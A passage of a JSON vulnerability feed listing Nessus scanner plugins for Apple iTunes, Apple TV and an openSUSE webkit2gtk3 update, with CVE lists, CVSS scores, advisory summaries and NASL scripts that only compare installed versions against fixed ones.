number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208852\");\n # https://lists.apple.com/archives/security-announce/2018/Jun/msg00006.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?375c8685\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.7.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4246\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Peer-To-Peer File Sharing\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_sharing.nasl\");\n script_require_keys(\"iTunes/sharing\");\n script_require_ports(\"Services/www\", 3689);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:3689, embedded:TRUE, ignore_broken:TRUE);\n\nget_kb_item_or_exit(\"iTunes/\" + port + \"/enabled\");\n\ntype = get_kb_item_or_exit(\"iTunes/\" + port + \"/type\");\nsource = get_kb_item_or_exit(\"iTunes/\" + port + \"/source\");\nversion = get_kb_item_or_exit(\"iTunes/\" + port + \"/version\");\n\nif (type != 'Windows') audit(AUDIT_OS_NOT, \"Windows\");\n\nfixed_version = \"12.7.5\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n report = '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"iTunes\", port, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:21:02", "description": "According to its banner, the version of Apple TV on the remote device\nis prior to 11.4. It is, therefore, affected by multiple\nvulnerabilities as described in the HT208850 security advisory.\n\nNote that only 4th and 5th generation models are affected by these\nvulnerabilities.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-05T00:00:00", "title": "Apple TV < 11.4 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4211", "CVE-2018-4223", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4241", "CVE-2018-4198", "CVE-2018-4237", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4235", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4206", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4249", "CVE-2018-4214", "CVE-2018-4240", "CVE-2018-5383", "CVE-2018-4232", "CVE-2018-4243", "CVE-2018-4200"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "APPLETV_11_4.NASL", "href": "https://www.tenable.com/plugins/nessus/110325", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110325);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\n \"CVE-2018-4188\",\n \"CVE-2018-4190\",\n \"CVE-2018-4192\",\n \"CVE-2018-4198\",\n \"CVE-2018-4199\",\n \"CVE-2018-4200\",\n \"CVE-2018-4201\",\n \"CVE-2018-4204\",\n \"CVE-2018-4206\",\n \"CVE-2018-4211\",\n \"CVE-2018-4214\",\n \"CVE-2018-4218\",\n \"CVE-2018-4222\",\n \"CVE-2018-4223\",\n \"CVE-2018-4224\",\n \"CVE-2018-4232\",\n \"CVE-2018-4233\",\n \"CVE-2018-4235\",\n \"CVE-2018-4237\",\n \"CVE-2018-4240\",\n \"CVE-2018-4241\",\n \"CVE-2018-4243\",\n \"CVE-2018-4246\",\n \"CVE-2018-4249\",\n \"CVE-2018-5383\"\n );\n script_bugtraq_id(\n 103957,\n 103958,\n 103961,\n 104378\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2018-6-01-6\");\n\n script_name(english:\"Apple TV < 11.4 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 11.4. It is, therefore, affected by multiple\nvulnerabilities as described in the HT208850 security advisory.\n\nNote that only 4th and 5th generation models are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208850\");\n # https://lists.apple.com/archives/security-announce/2018/Jun/msg00003.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0e8b8fb7\");\n # https://lists.apple.com/archives/security-announce/2018/Jul/msg00011.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b0bb7d4f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 11.4 or later. Note that this update is\nonly available for 4th and 5th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4241\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X libxpc MITM Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\n# https://en.wikipedia.org/wiki/TvOS\n# 4th gen model \"5,3\" and 5th gen model \"6,2\" share same build\nfixed_build = \"15L577\";\ntvos_ver = '11';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : make_list(4, 5),\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_HOLE\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T16:40:10", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the issues :\n\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-12911: Fixed an off-by-one error in\n xdg_mime_get_simple_globs (boo#1101999)\n\n - CVE-2017-13884: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-13885: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-7153: An unspecified issue allowed remote\n attackers to spoof user-interface information (about\n whether the entire content is derived from a valid TLS\n session) via a crafted website that sends a 401\n Unauthorized redirect (bsc#1077535).\n\n - CVE-2017-7160: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-7161: An unspecified issue allowed remote\n attackers to execute arbitrary code via special\n characters that trigger command injection (bsc#1075775,\n bsc#1077535).\n\n - CVE-2017-7165: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4088: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4096: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4200: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers a\n WebCore::jsElementScrollHeightGetter use-after-free\n (bsc#1092280).\n\n - CVE-2018-4204: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1092279).\n\n - CVE-2018-4101: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4113: An issue in the JavaScriptCore function\n in the 'WebKit' component allowed attackers to trigger\n an assertion failure by leveraging improper array\n indexing (bsc#1088182)\n\n - CVE-2018-4114: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4117: An unspecified issue allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1088182, bsc#1102530).\n\n - CVE-2018-4118: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4119: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4120: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4121: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1092278).\n\n - CVE-2018-4122: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4125: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4127: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4128: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4129: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4146: An unspecified issue allowed attackers to\n cause a denial of service (memory corruption) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4161: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4162: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4163: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4165: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693)\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-4246: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages type confusion (bsc#1104169) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandled\n an unset pageURL, leading to an application crash\n (bsc#1095611)\n\n - CVE-2018-4133: A Safari cross-site scripting (XSS)\n vulnerability allowed remote attackers to inject\n arbitrary web script or HTML via a crafted URL\n (bsc#1088182).\n\n - CVE-2018-11713: The libsoup network backend of WebKit\n unexpectedly failed to use system proxy settings for\n WebSocket connections. As a result, users could be\n deanonymized by crafted websites via a WebSocket\n connection (bsc#1096060).\n\n - CVE-2018-11712: The libsoup network backend of WebKit\n failed to perform TLS certificate verification for\n WebSocket connections (bsc#1096061).\n\nThis update for webkit2gtk3 fixes the following issues :\n\n - Fixed a crash when atk_object_ref_state_set is called on\n an AtkObject that's being destroyed (bsc#1088932).\n\n - Fixed crash when using Wayland with QXL/virtio\n (bsc#1079512)\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and\n fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues.\n\n - Do TLS error checking on\n GTlsConnection::accept-certificate to finish the load\n earlier in case of errors.\n\n - Properly close the connection to the nested wayland\n compositor in the Web Process.\n\n - Avoid painting backing stores for zero-opacity layers.\n\n - Fix downloads started by context menu failing in some\n websites due to missing user agent HTTP header.\n\n - Fix video unpause when GStreamerGL is disabled.\n\n - Fix several GObject introspection annotations.\n\n - Update user agent quiks to fix Outlook.com and\n Chase.com.\n\n - Fix several crashes and rendering issues.\n\n - Improve error message when Gigacage cannot allocate\n virtual memory.\n\n - Add missing WebKitWebProcessEnumTypes.h to\n webkit-web-extension.h.\n\n - Improve web process memory monitor thresholds.\n\n - Fix a web process crash when the web view is created and\n destroyed quickly.\n\n - Fix a network process crash when load is cancelled while\n searching for stored HTTP auth credentials.\n\n - Fix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and\n ENABLE_XSLT are disabled.\n\n - New API to retrieve and delete cookies with\n WebKitCookieManager.\n\n - New web process API to detect when form is submitted via\n JavaScript.\n\n - Several improvements and fixes in the touch/gestures\n support.\n\n - Support for the &ldquo;system&rdquo; CSS font family.\n\n - Complex text rendering improvements and fixes.\n\n - More complete and spec compliant WebDriver\n implementation.\n\n - Ensure DNS prefetching cannot be re-enabled if disabled\n by settings.\n\n - Fix seek sometimes not working.\n\n - Fix rendering of emojis that were using the wrong scale\n factor in some cases.\n\n - Fix rendering of combining enclosed keycap.\n\n - Fix rendering scale of some layers in HiDPI.\n\n - Fix a crash in Wayland when closing the web view.\n\n - Fix crashes upower crashes when running inside a chroot\n or on systems with broken dbus/upower.\n\n - Fix memory leaks in GStreamer media backend when using\n GStreamer 1.14.\n\n - Fix several crashes and rendering issues.\n\n - Add ENABLE_ADDRESS_SANITIZER to make it easier to build\n with asan support.\n\n - Fix a crash a under Wayland when using mesa software\n rasterization.\n\n - Make fullscreen video work again.\n\n - Fix handling of missing GStreamer elements.\n\n - Fix rendering when webm video is played twice.\n\n - Fix kinetic scrolling sometimes jumping around.\n\n - Fix build with ICU configured without collation support.\n\n - WebSockets use system proxy settings now (requires\n libsoup 2.61.90).\n\n - Show the context menu on long-press gesture.\n\n - Add support for Shift + mouse scroll to scroll\n horizontally.\n\n - Fix zoom gesture to actually zoom instead of changing\n the page scale.\n\n - Implement support for Graphics ARIA roles.\n\n - Make sleep inhibitors work under Flatpak.\n\n - Add get element CSS value command to WebDriver.\n\n - Fix a crash aftter a swipe gesture.\n\n - Fix several crashes and rendering issues.\n\n - Fix crashes due to duplicated symbols in\n libjavascriptcoregtk and libwebkit2gtk.\n\n - Fix parsing of timeout values in WebDriver.\n\n - Implement get timeouts command in WebDriver.\n\n - Fix deadlock in GStreamer video sink during shutdown\n when accelerated compositing is disabled.\n\n - Fix several crashes and rendering issues.\n\n - Add web process API to detect when form is submitted via\n JavaScript.\n\n - Add new API to replace\n webkit_form_submission_request_get_text_fields() that is\n now deprecated.\n\n - Add WebKitWebView::web-process-terminated signal and\n deprecate web-process-crashed.\n\n - Fix rendering issues when editing text areas.\n\n - Use FastMalloc based GstAllocator for GStreamer.\n\n - Fix web process crash at startup in bmalloc.\n\n - Fix several memory leaks in GStreamer media backend.\n\n - WebKitWebDriver process no longer links to\n libjavascriptcoregtk.\n\n - Fix several crashes and rendering issues.\n\n - Add new API to add, retrieve and delete cookies via\n WebKitCookieManager.\n\n - Add functions to WebSettings to convert font sizes\n between points and pixels.\n\n - Ensure cookie operations take effect when they happen\n before a web process has been spawned.\n\n - Automatically adjust font size when\n GtkSettings:gtk-xft-dpi changes.\n\n - Add initial resource load statistics support.\n\n - Add API to expose availability of certain editing\n commands in WebKitEditorState.\n\n - Add API to query whether a WebKitNavigationAction is a\n redirect or not.\n\n - Improve complex text rendering.\n\n - Add support for the 'system' CSS font family.\n\n - Disable USE_GSTREAMER_GL\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.", "edition": 15, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-26T00:00:00", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2018-1288)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4119", "CVE-2017-7161", "CVE-2018-4129", "CVE-2018-4165", "CVE-2018-4146", "CVE-2017-7165", "CVE-2018-4101", "CVE-2018-4128", "CVE-2018-4199", "CVE-2018-4163", "CVE-2018-12911", "CVE-2018-4120", "CVE-2018-4118", "CVE-2018-4114", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-11713", "CVE-2018-11712", "CVE-2018-4133", "CVE-2018-4162", "CVE-2017-7153", "CVE-2018-4125", "CVE-2017-7160", "CVE-2018-4233", "CVE-2018-4113", "CVE-2018-4222", "CVE-2017-13884", "CVE-2018-4127", "CVE-2018-4088", "CVE-2018-4204", "CVE-2018-4096", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4117", "CVE-2018-4161", "CVE-2017-13885", "CVE-2018-4232", "CVE-2018-4122", "CVE-2018-4200", "CVE-2018-4121"], "modified": "2018-10-26T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo"], "id": "OPENSUSE-2018-1288.NASL", "href": "https://www.tenable.com/plugins/nessus/118453", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1288.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118453);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-11646\", \"CVE-2018-11712\", \"CVE-2018-11713\", \"CVE-2018-12911\", \"CVE-2018-4088\", \"CVE-2018-4096\", \"CVE-2018-4101\", \"CVE-2018-4113\", \"CVE-2018-4114\", \"CVE-2018-4117\", \"CVE-2018-4118\", \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4121\", \"CVE-2018-4122\", \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\", \"CVE-2018-4133\", \"CVE-2018-4146\", \"CVE-2018-4161\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4200\", \"CVE-2018-4204\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2018-1288)\");\n script_summary(english:\"Check for the openSUSE-2018-1288 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the issues :\n\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-12911: Fixed an off-by-one error in\n xdg_mime_get_simple_globs (boo#1101999)\n\n - CVE-2017-13884: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-13885: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-7153: An unspecified issue allowed remote\n attackers to spoof user-interface information (about\n whether the entire content is derived from a valid TLS\n session) via a crafted website that sends a 401\n Unauthorized redirect (bsc#1077535).\n\n - CVE-2017-7160: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-7161: An unspecified issue allowed remote\n attackers to execute arbitrary code via special\n characters that trigger command injection (bsc#1075775,\n bsc#1077535).\n\n - CVE-2017-7165: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4088: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4096: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4200: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers a\n WebCore::jsElementScrollHeightGetter use-after-free\n (bsc#1092280).\n\n - CVE-2018-4204: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1092279).\n\n - CVE-2018-4101: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4113: An issue in the JavaScriptCore function\n in the 'WebKit' component allowed attackers to trigger\n an assertion failure by leveraging improper array\n indexing (bsc#1088182)\n\n - CVE-2018-4114: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4117: An unspecified issue allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1088182, bsc#1102530).\n\n - CVE-2018-4118: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4119: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4120: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4121: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1092278).\n\n - CVE-2018-4122: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4125: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4127: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4128: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4129: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4146: An unspecified issue allowed attackers to\n cause a denial of service (memory corruption) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4161: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4162: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4163: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4165: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693)\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n 